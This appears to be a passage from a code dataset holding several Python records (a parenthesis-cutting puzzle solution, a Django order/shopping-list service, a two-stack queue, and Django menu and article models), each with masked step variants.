As/(pi/4*d**2)\n wf = crack_width.solve_wf(M1,M2,M,σs,Es,d,a,b,n1)\n print('wf = ',wf)\n\n def test_column_strength(self): #随意修改测试\n b = 1200\n h = 1200\n l0 = 5\n a = 90\n a_ = 90\n Ec = 3.45E4 #MPa\n As = 12316\n As_ = 12316\n n = 10\n M = 2800 #kN\n N = 14000\n r = column_strength.solve_stress(b,h,l0,a,a_,Ec,As,As_,n,M,N,0)\n print('σc,σs,σs\\'\\n',r)\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
4,
5,
6,
8,
9
]
}
|
[
4,
5,
6,
8,
9
] |
# Count the pieces produced when lasers cut iron bars laid out as a string of
# parentheses: "()" is a laser shot, a longer "(...)" span is a bar.
# (Presumably the BOJ 10799 "iron bar" problem — confirm against the source.)
import sys
# Read the input from a local file instead of standard input.
sys.stdin = open("input.txt", "r")
stick = input()
cnt = 0    # total number of pieces produced so far
temp = []  # stack of '(' characters that are still open
for i, s in enumerate(stick):
    # Every '(' is pushed unconditionally; whether it starts a bar or a
    # laser "()" is only known when the matching ')' arrives.
    if s == '(':
        temp.append(s)
    else:
        # "()" pair => a laser shot: it cuts every bar currently open,
        # adding one piece per open bar.
        if stick[i-1] == '(':
            temp.pop()
            cnt += len(temp)
        # ')' closing a longer span => a bar ends here, contributing its
        # final trailing piece.
        else:
            temp.pop()
            cnt += 1
print(cnt)
|
normal
|
{
"blob_id": "9f38148c19f0cb9522725d9eb27c91f70055cba1",
"index": 4998,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i, s in enumerate(stick):\n if s == '(':\n temp.append(s)\n elif stick[i - 1] == '(':\n temp.pop()\n cnt += len(temp)\n else:\n temp.pop()\n cnt += 1\nprint(cnt)\n",
"step-3": "<mask token>\nsys.stdin = open('input.txt', 'r')\nstick = input()\ncnt = 0\ntemp = []\nfor i, s in enumerate(stick):\n if s == '(':\n temp.append(s)\n elif stick[i - 1] == '(':\n temp.pop()\n cnt += len(temp)\n else:\n temp.pop()\n cnt += 1\nprint(cnt)\n",
"step-4": "import sys\nsys.stdin = open('input.txt', 'r')\nstick = input()\ncnt = 0\ntemp = []\nfor i, s in enumerate(stick):\n if s == '(':\n temp.append(s)\n elif stick[i - 1] == '(':\n temp.pop()\n cnt += len(temp)\n else:\n temp.pop()\n cnt += 1\nprint(cnt)\n",
"step-5": "import sys\nsys.stdin = open(\"input.txt\", \"r\")\nstick = input()\ncnt = 0\ntemp =[]\n\nfor i,s in enumerate(stick):\n #'('나오면 무조건 추가\n if s == '(':\n temp.append(s)\n \n else:\n #절단인 경우\n if stick[i-1] == '(':\n temp.pop()\n cnt += len(temp)\n\n #길이가 짧아 아웃 \n else:\n temp.pop()\n cnt +=1\n \n \nprint(cnt)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class StaticDataDao(type):
@property
def delivery_statuses(cls):
if getattr(cls, '_delivery_statuses', None) is None:
cls._delivery_statuses = list(DeliveryStatus.objects.all())
return cls._delivery_statuses
@property
def calc_parameters(cls):
if getattr(cls, '_calc_parameters', None) is None:
m = {}
for p in list(CalcParameters.objects.all()):
m[p.name] = p.value
cls._calc_parameters = m
return cls._calc_parameters
class StaticDataService(object):
__metaclass__ = StaticDataDao
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataService:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class StaticDataDao(type):
@property
def delivery_statuses(cls):
if getattr(cls, '_delivery_statuses', None) is None:
cls._delivery_statuses = list(DeliveryStatus.objects.all())
return cls._delivery_statuses
@property
def calc_parameters(cls):
if getattr(cls, '_calc_parameters', None) is None:
m = {}
for p in list(CalcParameters.objects.all()):
m[p.name] = p.value
cls._calc_parameters = m
return cls._calc_parameters
class StaticDataService(object):
__metaclass__ = StaticDataDao
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataService:
def __init__(self):
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class StaticDataDao(type):
@property
def delivery_statuses(cls):
if getattr(cls, '_delivery_statuses', None) is None:
cls._delivery_statuses = list(DeliveryStatus.objects.all())
return cls._delivery_statuses
@property
def calc_parameters(cls):
if getattr(cls, '_calc_parameters', None) is None:
m = {}
for p in list(CalcParameters.objects.all()):
m[p.name] = p.value
cls._calc_parameters = m
return cls._calc_parameters
class StaticDataService(object):
__metaclass__ = StaticDataDao
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataService:
def __init__(self):
pass
@staticmethod
def get_all_orders():
orders = Order.objects.order_by('-order_date')
for o in orders:
o.package_names = ', '.join([p.name for p in list(o.packages.
all())])
o.delivery_date = o.deliveryinfo_set.get().delivery_date
o.delivery_charge = o.deliveryinfo_set.get().charge
return orders
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class StaticDataDao(type):
@property
def delivery_statuses(cls):
if getattr(cls, '_delivery_statuses', None) is None:
cls._delivery_statuses = list(DeliveryStatus.objects.all())
return cls._delivery_statuses
@property
def calc_parameters(cls):
if getattr(cls, '_calc_parameters', None) is None:
m = {}
for p in list(CalcParameters.objects.all()):
m[p.name] = p.value
cls._calc_parameters = m
return cls._calc_parameters
class StaticDataService(object):
__metaclass__ = StaticDataDao
<|reserved_special_token_1|>
from django.db import connection
from .models import Order
from .models import Package
from .models import DeliveryStatus
from .models import CalcParameters
class DataService:
    """Read-only query helpers over the order/package/dish Django models."""

    def __init__(self):
        pass

    @staticmethod
    def get_all_orders():
        """Return all orders, newest first, with extra display attributes
        (package_names, delivery_date, delivery_charge) attached to each."""
        orders = Order.objects.order_by('-order_date')
        # create new variables for display
        for o in orders:
            o.package_names = ', '.join([p.name for p in list(o.packages.all())])
            # NOTE(review): deliveryinfo_set.get() is called twice and assumes
            # exactly one DeliveryInfo per order — confirm with the model.
            o.delivery_date = o.deliveryinfo_set.get().delivery_date
            o.delivery_charge = o.deliveryinfo_set.get().charge
        return orders

    @staticmethod
    def get_all_packages():
        """Return a queryset of every Package."""
        return Package.objects.all()

    @staticmethod
    def get_shopping_list_details(order_ids, dish_ids=None):
        """
        :param order_ids: a list of order ids as int or str. Or a single order id as int or str
        :param dish_ids: Restrict shopping list to these dishes.
            A list of dish ids as int or str. Or a single order id as int or str.
            NOTE(review): currently unused by the query below.
        :return: Return shopping list for the given orders
        """
        # Normalise the argument to a list of ints.
        if isinstance(order_ids, str):
            order_ids = [int(order_ids)]
        if isinstance(order_ids, int):
            order_ids = [order_ids]
        if not isinstance(order_ids, list):
            raise Exception('Expecting a single order id or a list of order ids. Got [{ids}]'.format(ids=order_ids))

        # Aggregate ingredient weight and cost per dish/ingredient across all
        # dishes in the selected orders, scaled by the ordered package quantity.
        SQL = """select
            d.id dish_id,
            d.name dish_name,
            sum(op.package_qty) dish_qty,
            sum(d.portion_count) portion_count,
            i.name ingredient_name,
            round(sum(di.ingredient_weight * op.package_qty), 2) total_ingredient_weight,
            round(sum(di.ingredient_weight * (i.cost_price/i.measure) * op.package_qty), 2) total_cost_price
        from
            orders o, order_package op, package_dish pd, dish d, dish_ingredient di, ingredient i
        where
            o.id = op.order_id and
            op.package_id = pd.package_id and
            pd.dish_id = d.id and
            d.id = di.dish_id and
            di.ingredient_id = i.id and
            o.id in ({ids})
        group by d.id, d.name, i.name
        order by d.name, i.name""".format(ids=','.join([str(x) for x in order_ids]))

        with connection.cursor() as cursor:
            cursor.execute(SQL)
            rows = cursor.fetchall()

        # return a list of tuples rather than a tuple of tuples
        return [row for row in rows]
class StaticDataDao(type):
    """Metaclass adding lazily-cached, class-level properties for static
    reference data (delivery statuses and calculation parameters).

    Each property hits the database once per process and memoises the
    result on the class object itself.
    """

    @property
    def delivery_statuses(cls):
        # Cache the full DeliveryStatus table on first access.
        if getattr(cls, '_delivery_statuses', None) is None:
            cls._delivery_statuses = list(DeliveryStatus.objects.all())
        return cls._delivery_statuses

    @property
    def calc_parameters(cls):
        # Cache CalcParameters rows as a name -> value dict on first access.
        if getattr(cls, '_calc_parameters', None) is None:
            m = {}
            for p in list(CalcParameters.objects.all()):
                m[p.name] = p.value
            cls._calc_parameters = m
        return cls._calc_parameters
class StaticDataService(object):
    """Facade exposing StaticDataDao's cached class properties.

    NOTE(review): ``__metaclass__`` is the Python 2 spelling; under
    Python 3 it is ignored, so this class would NOT receive the metaclass
    properties — confirm the target interpreter (Python 3 requires
    ``class StaticDataService(metaclass=StaticDataDao)``).
    """
    __metaclass__ = StaticDataDao
|
flexible
|
{
"blob_id": "2e66a31638eb4e619f14a29d5d3847482d207003",
"index": 3996,
"step-1": "<mask token>\n\n\nclass StaticDataDao(type):\n\n @property\n def delivery_statuses(cls):\n if getattr(cls, '_delivery_statuses', None) is None:\n cls._delivery_statuses = list(DeliveryStatus.objects.all())\n return cls._delivery_statuses\n\n @property\n def calc_parameters(cls):\n if getattr(cls, '_calc_parameters', None) is None:\n m = {}\n for p in list(CalcParameters.objects.all()):\n m[p.name] = p.value\n cls._calc_parameters = m\n return cls._calc_parameters\n\n\nclass StaticDataService(object):\n __metaclass__ = StaticDataDao\n",
"step-2": "<mask token>\n\n\nclass DataService:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass StaticDataDao(type):\n\n @property\n def delivery_statuses(cls):\n if getattr(cls, '_delivery_statuses', None) is None:\n cls._delivery_statuses = list(DeliveryStatus.objects.all())\n return cls._delivery_statuses\n\n @property\n def calc_parameters(cls):\n if getattr(cls, '_calc_parameters', None) is None:\n m = {}\n for p in list(CalcParameters.objects.all()):\n m[p.name] = p.value\n cls._calc_parameters = m\n return cls._calc_parameters\n\n\nclass StaticDataService(object):\n __metaclass__ = StaticDataDao\n",
"step-3": "<mask token>\n\n\nclass DataService:\n\n def __init__(self):\n pass\n <mask token>\n <mask token>\n <mask token>\n\n\nclass StaticDataDao(type):\n\n @property\n def delivery_statuses(cls):\n if getattr(cls, '_delivery_statuses', None) is None:\n cls._delivery_statuses = list(DeliveryStatus.objects.all())\n return cls._delivery_statuses\n\n @property\n def calc_parameters(cls):\n if getattr(cls, '_calc_parameters', None) is None:\n m = {}\n for p in list(CalcParameters.objects.all()):\n m[p.name] = p.value\n cls._calc_parameters = m\n return cls._calc_parameters\n\n\nclass StaticDataService(object):\n __metaclass__ = StaticDataDao\n",
"step-4": "<mask token>\n\n\nclass DataService:\n\n def __init__(self):\n pass\n\n @staticmethod\n def get_all_orders():\n orders = Order.objects.order_by('-order_date')\n for o in orders:\n o.package_names = ', '.join([p.name for p in list(o.packages.\n all())])\n o.delivery_date = o.deliveryinfo_set.get().delivery_date\n o.delivery_charge = o.deliveryinfo_set.get().charge\n return orders\n <mask token>\n <mask token>\n\n\nclass StaticDataDao(type):\n\n @property\n def delivery_statuses(cls):\n if getattr(cls, '_delivery_statuses', None) is None:\n cls._delivery_statuses = list(DeliveryStatus.objects.all())\n return cls._delivery_statuses\n\n @property\n def calc_parameters(cls):\n if getattr(cls, '_calc_parameters', None) is None:\n m = {}\n for p in list(CalcParameters.objects.all()):\n m[p.name] = p.value\n cls._calc_parameters = m\n return cls._calc_parameters\n\n\nclass StaticDataService(object):\n __metaclass__ = StaticDataDao\n",
"step-5": "from django.db import connection\n\nfrom .models import Order\nfrom .models import Package\nfrom .models import DeliveryStatus\nfrom .models import CalcParameters\n\n\nclass DataService:\n def __init__(self):\n pass\n\n @staticmethod\n def get_all_orders():\n orders = Order.objects.order_by('-order_date')\n # create new variables for display\n for o in orders:\n o.package_names = ', '.join([p.name for p in list(o.packages.all())])\n o.delivery_date = o.deliveryinfo_set.get().delivery_date\n o.delivery_charge = o.deliveryinfo_set.get().charge\n return orders\n\n @staticmethod\n def get_all_packages():\n return Package.objects.all()\n\n @staticmethod\n def get_shopping_list_details(order_ids, dish_ids=None):\n \"\"\"\n :param order_ids: a list of order ids as int or str. Or a single order id as int or str\n :param dish_ids: Restrict shopping list to these dishes.\n A list of dish ids as int or str. Or a single order id as int or str.\n :return: Return shopping list for the given orders\n \"\"\"\n if isinstance(order_ids, str):\n order_ids = [int(order_ids)]\n if isinstance(order_ids, int):\n order_ids = [order_ids]\n if not isinstance(order_ids, list):\n raise Exception('Expecting a single order id or a list of order ids. 
Got [{ids}]'.format(ids=order_ids))\n\n SQL = \"\"\"select\n d.id dish_id,\n d.name dish_name,\n sum(op.package_qty) dish_qty,\n sum(d.portion_count) portion_count,\n i.name ingredient_name,\n round(sum(di.ingredient_weight * op.package_qty), 2) total_ingredient_weight,\n round(sum(di.ingredient_weight * (i.cost_price/i.measure) * op.package_qty), 2) total_cost_price\n from\n orders o, order_package op, package_dish pd, dish d, dish_ingredient di, ingredient i\n where\n o.id = op.order_id and\n op.package_id = pd.package_id and\n pd.dish_id = d.id and\n d.id = di.dish_id and\n di.ingredient_id = i.id and\n o.id in ({ids})\n group by d.id,\td.name, i.name\n order by d.name, i.name\"\"\".format(ids=','.join([str(x) for x in order_ids]))\n\n with connection.cursor() as cursor:\n cursor.execute(SQL)\n rows = cursor.fetchall()\n\n # return a list of tuples rather than a tuple of tuples\n return [row for row in rows]\n\n\nclass StaticDataDao(type):\n @property\n def delivery_statuses(cls):\n if getattr(cls, '_delivery_statuses', None) is None:\n cls._delivery_statuses = list(DeliveryStatus.objects.all())\n return cls._delivery_statuses\n\n @property\n def calc_parameters(cls):\n if getattr(cls, '_calc_parameters', None) is None:\n m = {}\n for p in list(CalcParameters.objects.all()):\n m[p.name] = p.value\n cls._calc_parameters = m\n return cls._calc_parameters\n\n\nclass StaticDataService(object):\n __metaclass__ = StaticDataDao\n",
"step-ids": [
5,
6,
7,
8,
12
]
}
|
[
5,
6,
7,
8,
12
] |
from __future__ import print_function
class StackQueue(object):
    """FIFO queue built from two LIFO stacks.

    ``stack1`` receives every enqueued item; when the outgoing ``stack2``
    runs dry, the inbox is drained into it, which reverses the order and
    restores FIFO semantics. Amortised O(1) per operation.
    """

    def __init__(self):
        self.stack1 = []  # inbox: newest items on top
        self.stack2 = []  # outbox: oldest items on top

    def enqueue(self, data):
        """Append *data* to the back of the queue."""
        self.stack1.append(data)

    def _shift(self):
        # Refill the outbox from the inbox only when the outbox is empty;
        # popping the inbox reverses insertion order.
        if not self.stack2:
            while self.stack1:
                self.stack2.append(self.stack1.pop())

    def dequeue(self):
        """Remove and return the front item (raises IndexError if empty)."""
        self._shift()
        return self.stack2.pop()

    def peek(self):
        """Return the front item without removing it (raises IndexError if empty)."""
        self._shift()
        return self.stack2[-1]
def _test():
    """Placeholder for automated checks; nothing is verified yet."""
    pass
def _print():
    """Demo: enqueue 1..3, then print the first dequeued item and the
    new front of the queue."""
    queue = StackQueue()
    for value in (1, 2, 3):
        queue.enqueue(value)
    front = queue.dequeue()
    print(front)
    print(queue.peek())
if __name__ == '__main__':
    # Run the (empty) test hook, then the interactive demo.
    _test()
    _print()
|
normal
|
{
"blob_id": "24f6328d578b6145bf86d7b5378a081463936df3",
"index": 9670,
"step-1": "<mask token>\n\n\nclass StackQueue(object):\n <mask token>\n <mask token>\n\n def enqueue(self, data):\n self.stack1.append(data)\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass StackQueue(object):\n \"\"\"Queue implemented with two stacks\"\"\"\n\n def __init__(self):\n self.stack1 = []\n self.stack2 = []\n\n def enqueue(self, data):\n self.stack1.append(data)\n\n def dequeue(self):\n if self.stack2:\n return self.stack2.pop()\n else:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n return self.stack2.pop()\n\n def peek(self):\n if self.stack2:\n return self.stack2[-1]\n else:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n return self.stack2[-1]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass StackQueue(object):\n \"\"\"Queue implemented with two stacks\"\"\"\n\n def __init__(self):\n self.stack1 = []\n self.stack2 = []\n\n def enqueue(self, data):\n self.stack1.append(data)\n\n def dequeue(self):\n if self.stack2:\n return self.stack2.pop()\n else:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n return self.stack2.pop()\n\n def peek(self):\n if self.stack2:\n return self.stack2[-1]\n else:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n return self.stack2[-1]\n\n\ndef _test():\n pass\n\n\ndef _print():\n q = StackQueue()\n q.enqueue(1)\n q.enqueue(2)\n q.enqueue(3)\n d1 = q.dequeue()\n print(d1)\n print(q.peek())\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass StackQueue(object):\n \"\"\"Queue implemented with two stacks\"\"\"\n\n def __init__(self):\n self.stack1 = []\n self.stack2 = []\n\n def enqueue(self, data):\n self.stack1.append(data)\n\n def dequeue(self):\n if self.stack2:\n return self.stack2.pop()\n else:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n return self.stack2.pop()\n\n def peek(self):\n if self.stack2:\n return self.stack2[-1]\n else:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n return self.stack2[-1]\n\n\ndef _test():\n pass\n\n\ndef _print():\n q = StackQueue()\n q.enqueue(1)\n q.enqueue(2)\n q.enqueue(3)\n d1 = q.dequeue()\n print(d1)\n print(q.peek())\n\n\nif __name__ == '__main__':\n _test()\n _print()\n",
"step-5": "from __future__ import print_function\n\n\nclass StackQueue(object):\n \"\"\"Queue implemented with two stacks\"\"\"\n def __init__(self):\n self.stack1 = []\n self.stack2 = []\n\n def enqueue(self, data):\n self.stack1.append(data)\n\n def dequeue(self):\n if self.stack2:\n return self.stack2.pop()\n else:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n return self.stack2.pop()\n\n def peek(self):\n if self.stack2:\n return self.stack2[-1]\n else:\n while self.stack1:\n self.stack2.append(self.stack1.pop())\n return self.stack2[-1]\n\n\ndef _test():\n pass\n\n\ndef _print():\n q = StackQueue()\n q.enqueue(1)\n q.enqueue(2)\n q.enqueue(3)\n d1 = q.dequeue()\n print(d1)\n print(q.peek())\n\n\nif __name__ == '__main__':\n _test()\n _print()\n",
"step-ids": [
2,
6,
8,
9,
11
]
}
|
[
2,
6,
8,
9,
11
] |
<|reserved_special_token_0|>
class SonMenu(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
verbose_name = u'二级菜单'
verbose_name_plural = u'二级菜单'
<|reserved_special_token_0|>
class Img(models.Model):
tag = models.CharField(u'类型', max_length=20)
tagId = models.IntegerField(u'序号')
intro = models.CharField(u'描述', max_length=100)
title = models.CharField(u'标题', max_length=100)
slug = models.CharField(u'链接', max_length=100, db_index=True)
class Meta:
verbose_name = u'图片'
verbose_name_plural = u'图片'
def __unicode__(self):
return self.slug
class Article(models.Model):
tag = models.CharField(u'类型', max_length=20)
title = models.CharField(u'标题', max_length=100)
content = models.TextField(u'内容', default=u'', blank=True)
author = models.CharField(u'作者', max_length=100)
pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)
home_display = models.BooleanField(u'首页显示', default=False)
class Meta:
verbose_name = u'文章'
verbose_name_plural = u'文章'
def __unicode__(self):
return self.title
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SonMenu(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
verbose_name = u'二级菜单'
verbose_name_plural = u'二级菜单'
def __unicode__(self):
return self.title
class Img(models.Model):
tag = models.CharField(u'类型', max_length=20)
tagId = models.IntegerField(u'序号')
intro = models.CharField(u'描述', max_length=100)
title = models.CharField(u'标题', max_length=100)
slug = models.CharField(u'链接', max_length=100, db_index=True)
class Meta:
verbose_name = u'图片'
verbose_name_plural = u'图片'
def __unicode__(self):
return self.slug
class Article(models.Model):
tag = models.CharField(u'类型', max_length=20)
title = models.CharField(u'标题', max_length=100)
content = models.TextField(u'内容', default=u'', blank=True)
author = models.CharField(u'作者', max_length=100)
pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)
home_display = models.BooleanField(u'首页显示', default=False)
class Meta:
verbose_name = u'文章'
verbose_name_plural = u'文章'
def __unicode__(self):
return self.title
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FatherMenu(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
verbose_name = u'一级菜单'
verbose_name_plural = u'一级菜单'
<|reserved_special_token_0|>
class SonMenu(models.Model):
title = models.CharField(u'菜单名', max_length=20)
slug = models.CharField(u'链接', max_length=100, db_index=True)
father = models.ForeignKey('seclab.FatherMenu', blank=True, null=True,
verbose_name=u'父菜单')
class Meta:
verbose_name = u'二级菜单'
verbose_name_plural = u'二级菜单'
def __unicode__(self):
return self.title
class Img(models.Model):
tag = models.CharField(u'类型', max_length=20)
tagId = models.IntegerField(u'序号')
intro = models.CharField(u'描述', max_length=100)
title = models.CharField(u'标题', max_length=100)
slug = models.CharField(u'链接', max_length=100, db_index=True)
class Meta:
verbose_name = u'图片'
verbose_name_plural = u'图片'
def __unicode__(self):
return self.slug
class Article(models.Model):
tag = models.CharField(u'类型', max_length=20)
title = models.CharField(u'标题', max_length=100)
content = models.TextField(u'内容', default=u'', blank=True)
author = models.CharField(u'作者', max_length=100)
pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)
home_display = models.BooleanField(u'首页显示', default=False)
class Meta:
verbose_name = u'文章'
verbose_name_plural = u'文章'
def __unicode__(self):
return self.title
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FatherMenu(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
verbose_name = u'一级菜单'
verbose_name_plural = u'一级菜单'
def __unicode__(self):
return self.title
class SonMenu(models.Model):
title = models.CharField(u'菜单名', max_length=20)
slug = models.CharField(u'链接', max_length=100, db_index=True)
father = models.ForeignKey('seclab.FatherMenu', blank=True, null=True,
verbose_name=u'父菜单')
class Meta:
verbose_name = u'二级菜单'
verbose_name_plural = u'二级菜单'
def __unicode__(self):
return self.title
class Img(models.Model):
tag = models.CharField(u'类型', max_length=20)
tagId = models.IntegerField(u'序号')
intro = models.CharField(u'描述', max_length=100)
title = models.CharField(u'标题', max_length=100)
slug = models.CharField(u'链接', max_length=100, db_index=True)
class Meta:
verbose_name = u'图片'
verbose_name_plural = u'图片'
def __unicode__(self):
return self.slug
class Article(models.Model):
tag = models.CharField(u'类型', max_length=20)
title = models.CharField(u'标题', max_length=100)
content = models.TextField(u'内容', default=u'', blank=True)
author = models.CharField(u'作者', max_length=100)
pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)
home_display = models.BooleanField(u'首页显示', default=False)
class Meta:
verbose_name = u'文章'
verbose_name_plural = u'文章'
def __unicode__(self):
return self.title
<|reserved_special_token_1|>
# _*_ coding:utf-8 _*_
from __future__ import unicode_literals
from django.db import models
from django.core.urlresolvers import reverse
# Create your models here.
# 本文件中,用__unicode__代替了__str__,以免在admin界面中显示中文而引发错误。
# 参考:http://blog.csdn.net/jiangnanandi/article/details/3574007
# 或者另一个解决方案:http://blog.sina.com.cn/s/blog_63cf1c510101an74.html
class FatherMenu(models.Model):
    """Top-level (first-level) navigation menu entry."""

    title = models.CharField(u"菜单名", max_length=20)
    slug = models.CharField(u"链接", max_length=100, db_index=True)
    # Flag meaning "has child menus?" (子菜单?) — presumably toggles whether
    # SonMenu entries are rendered under this item; TODO confirm in templates.
    son = models.BooleanField("子菜单?", default=False)

    class Meta:
        verbose_name = u"一级菜单"
        verbose_name_plural = u"一级菜单"

    def __unicode__(self):
        # Python 2 display label (see the module header comment on why
        # __unicode__ is used instead of __str__ for Chinese text).
        return self.title
class SonMenu(models.Model):
    """Second-level menu entry, optionally attached to a FatherMenu parent."""

    title = models.CharField(u"菜单名", max_length=20)
    slug = models.CharField(u"链接", max_length=100, db_index=True)
    # blank=True/null=True make the parent optional, so a SonMenu can be
    # saved without a FatherMenu.
    father = models.ForeignKey(
        'seclab.FatherMenu', blank=True, null=True, verbose_name=u"父菜单")

    class Meta:
        verbose_name = u"二级菜单"
        verbose_name_plural = u"二级菜单"

    def __unicode__(self):
        # Python 2 display label (see module header comment).
        return self.title
class Img(models.Model):
    """Image record: category tag, sequence number, description, title, link."""

    tag = models.CharField(u"类型", max_length=20)
    # 序号 — presumably an ordering index within the tag; TODO confirm usage.
    tagId = models.IntegerField(u"序号")
    intro = models.CharField(u"描述", max_length=100)
    title = models.CharField(u"标题", max_length=100)
    # Indexed because images are looked up by their link slug.
    slug = models.CharField(u"链接", max_length=100, db_index=True)

    class Meta:
        verbose_name = u"图片"
        verbose_name_plural = u"图片"

    def __unicode__(self):
        # Display label is the slug, not the title.
        return self.slug
class Article(models.Model):
    """Article with a category tag, author, publication date and body text."""

    tag = models.CharField(u"类型", max_length=20)
    title = models.CharField(u"标题", max_length=100)
    content = models.TextField(u"内容", default=u'', blank=True)
    author = models.CharField(u"作者", max_length=100)
    # NOTE(review): Django forces editable=False when auto_now_add=True, so
    # the editable=True here has no effect — confirm intended behaviour.
    pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)
    # When True the article is shown on the home page (首页显示).
    home_display = models.BooleanField(u"首页显示", default=False)

    class Meta:
        verbose_name = u"文章"
        verbose_name_plural = u"文章"

    def __unicode__(self):
        return self.title
|
flexible
|
{
"blob_id": "49b007b723b9c43fb79d5dffa2546c856faf4937",
"index": 8625,
"step-1": "<mask token>\n\n\nclass SonMenu(models.Model):\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n verbose_name = u'二级菜单'\n verbose_name_plural = u'二级菜单'\n <mask token>\n\n\nclass Img(models.Model):\n tag = models.CharField(u'类型', max_length=20)\n tagId = models.IntegerField(u'序号')\n intro = models.CharField(u'描述', max_length=100)\n title = models.CharField(u'标题', max_length=100)\n slug = models.CharField(u'链接', max_length=100, db_index=True)\n\n\n class Meta:\n verbose_name = u'图片'\n verbose_name_plural = u'图片'\n\n def __unicode__(self):\n return self.slug\n\n\nclass Article(models.Model):\n tag = models.CharField(u'类型', max_length=20)\n title = models.CharField(u'标题', max_length=100)\n content = models.TextField(u'内容', default=u'', blank=True)\n author = models.CharField(u'作者', max_length=100)\n pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)\n home_display = models.BooleanField(u'首页显示', default=False)\n\n\n class Meta:\n verbose_name = u'文章'\n verbose_name_plural = u'文章'\n\n def __unicode__(self):\n return self.title\n",
"step-2": "<mask token>\n\n\nclass SonMenu(models.Model):\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n verbose_name = u'二级菜单'\n verbose_name_plural = u'二级菜单'\n\n def __unicode__(self):\n return self.title\n\n\nclass Img(models.Model):\n tag = models.CharField(u'类型', max_length=20)\n tagId = models.IntegerField(u'序号')\n intro = models.CharField(u'描述', max_length=100)\n title = models.CharField(u'标题', max_length=100)\n slug = models.CharField(u'链接', max_length=100, db_index=True)\n\n\n class Meta:\n verbose_name = u'图片'\n verbose_name_plural = u'图片'\n\n def __unicode__(self):\n return self.slug\n\n\nclass Article(models.Model):\n tag = models.CharField(u'类型', max_length=20)\n title = models.CharField(u'标题', max_length=100)\n content = models.TextField(u'内容', default=u'', blank=True)\n author = models.CharField(u'作者', max_length=100)\n pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)\n home_display = models.BooleanField(u'首页显示', default=False)\n\n\n class Meta:\n verbose_name = u'文章'\n verbose_name_plural = u'文章'\n\n def __unicode__(self):\n return self.title\n",
"step-3": "<mask token>\n\n\nclass FatherMenu(models.Model):\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n verbose_name = u'一级菜单'\n verbose_name_plural = u'一级菜单'\n <mask token>\n\n\nclass SonMenu(models.Model):\n title = models.CharField(u'菜单名', max_length=20)\n slug = models.CharField(u'链接', max_length=100, db_index=True)\n father = models.ForeignKey('seclab.FatherMenu', blank=True, null=True,\n verbose_name=u'父菜单')\n\n\n class Meta:\n verbose_name = u'二级菜单'\n verbose_name_plural = u'二级菜单'\n\n def __unicode__(self):\n return self.title\n\n\nclass Img(models.Model):\n tag = models.CharField(u'类型', max_length=20)\n tagId = models.IntegerField(u'序号')\n intro = models.CharField(u'描述', max_length=100)\n title = models.CharField(u'标题', max_length=100)\n slug = models.CharField(u'链接', max_length=100, db_index=True)\n\n\n class Meta:\n verbose_name = u'图片'\n verbose_name_plural = u'图片'\n\n def __unicode__(self):\n return self.slug\n\n\nclass Article(models.Model):\n tag = models.CharField(u'类型', max_length=20)\n title = models.CharField(u'标题', max_length=100)\n content = models.TextField(u'内容', default=u'', blank=True)\n author = models.CharField(u'作者', max_length=100)\n pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)\n home_display = models.BooleanField(u'首页显示', default=False)\n\n\n class Meta:\n verbose_name = u'文章'\n verbose_name_plural = u'文章'\n\n def __unicode__(self):\n return self.title\n",
